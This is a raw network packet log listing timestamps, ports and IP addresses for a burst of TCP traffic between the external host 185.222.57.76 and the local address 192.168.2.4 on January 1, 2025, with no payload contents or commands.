Jan 1, 2025 12:32:23.475178957 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475187063 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475199938 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475208998 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475210905 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475224972 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475234032 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475234032 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475270033 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475270987 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475280046 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475297928 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475331068 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475337029 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475347042 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475363016 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475370884 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475392103 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475404024 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475410938 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475419998 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475429058 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475436926 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475447893 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475456953 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475461960 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475492954 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475495100 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475506067 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475538015 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475553989 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475553989 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475564003 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475572109 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475588083 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475600958 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475611925 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475615978 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475621939 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475630999 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475660086 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475665092 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475675106 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475711107 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475713015 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475722075 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475735903 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475744963 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475785971 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475790024 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475794077 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475831032 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475840092 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475850105 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475887060 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475891113 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475902081 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475943089 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.475944042 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475955009 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.475990057 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476023912 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476032972 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476039886 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476047993 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476068974 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476087093 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476106882 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476116896 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476124048 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476162910 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476191998 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476201057 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476208925 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476226091 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476234913 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476234913 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476257086 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476283073 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476284027 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476294994 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476301908 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476310968 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476330042 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476340055 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476350069 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476366043 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476370096 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476378918 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476393938 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476412058 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476421118 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476421118 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476449013 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476453066 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476459980 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476464033 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476478100 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476485968 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476509094 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476525068 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476525068 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476535082 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476562977 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476578951 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476586103 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476591110 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476608992 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476617098 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476629972 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476633072 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476641893 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476670980 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476680994 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476691008 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476700068 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476726055 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476733923 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476739883 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476763964 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476768970 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476773977 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476821899 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476823092 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476830959 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476847887 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476855993 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476856947 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:23.476892948 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476902008 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476938963 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476947069 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476972103 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476980925 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.476996899 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477005005 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477029085 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477036953 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477071047 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477087975 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477108955 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477117062 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477140903 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477149010 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477178097 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477186918 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477235079 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477243900 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477258921 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477266073 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477292061 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477298975 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477319002 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477328062 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477413893 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477422953 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477428913 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477437019 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477449894 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477458000 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477503061 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477510929 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477544069 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477552891 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477555990 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477562904 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477580070 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477588892 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477610111 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477617979 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477644920 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477653027 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477688074 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477695942 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477731943 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477741003 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477756023 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477762938 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477850914 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477858067 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477866888 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477876902 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477893114 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477900982 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477907896 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477916956 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477989912 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.477998018 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478004932 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478013039 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478023052 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478032112 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478049994 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478058100 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478070021 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478077888 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478107929 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478116035 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478163004 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478172064 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478189945 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478197098 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478213072 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478220940 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478246927 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478255033 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478310108 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478317976 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478332996 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478341103 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478373051 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478382111 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478398085 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478405952 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478456020 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478463888 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478523970 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478532076 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478538990 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478547096 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478564978 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478573084 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478636980 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478646040 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478652954 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478661060 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478678942 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478688002 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478698015 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478723049 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478732109 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478832960 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478841066 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478844881 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478852987 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478869915 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478878021 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478914976 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478923082 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.478996038 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479006052 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479013920 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479021072 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479032993 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479039907 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479082108 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479090929 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479136944 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479146004 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479151011 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479157925 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479238987 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479247093 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479254961 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479264975 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479281902 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479291916 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479329109 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479336977 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479366064 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479374886 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479378939 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479387045 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479441881 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479449987 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479491949 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479501009 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479543924 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479552984 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479600906 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479609966 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479625940 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479634047 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479649067 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479657888 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479706049 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479715109 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479752064 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479759932 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479809999 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479818106 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479860067 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479870081 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479955912 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.479964018 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480004072 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480011940 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480017900 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480026960 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480067015 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480074883 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480119944 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480129004 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480165958 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480174065 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480176926 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480185986 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480226994 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480235100 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480278969 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480288029 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480297089 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480305910 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480348110 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480355978 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480370998 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480380058 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480423927 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480432987 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480478048 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480487108 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480495930 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480515003 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480525017 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480531931 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480571032 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480580091 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480626106 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480633974 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480647087 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480662107 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480678082 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480686903 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480753899 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480762959 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480817080 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480824947 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480834007 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480853081 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480861902 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480870008 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480915070 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480923891 CET	55615	49748	185.222.57.76	192.168.2.4
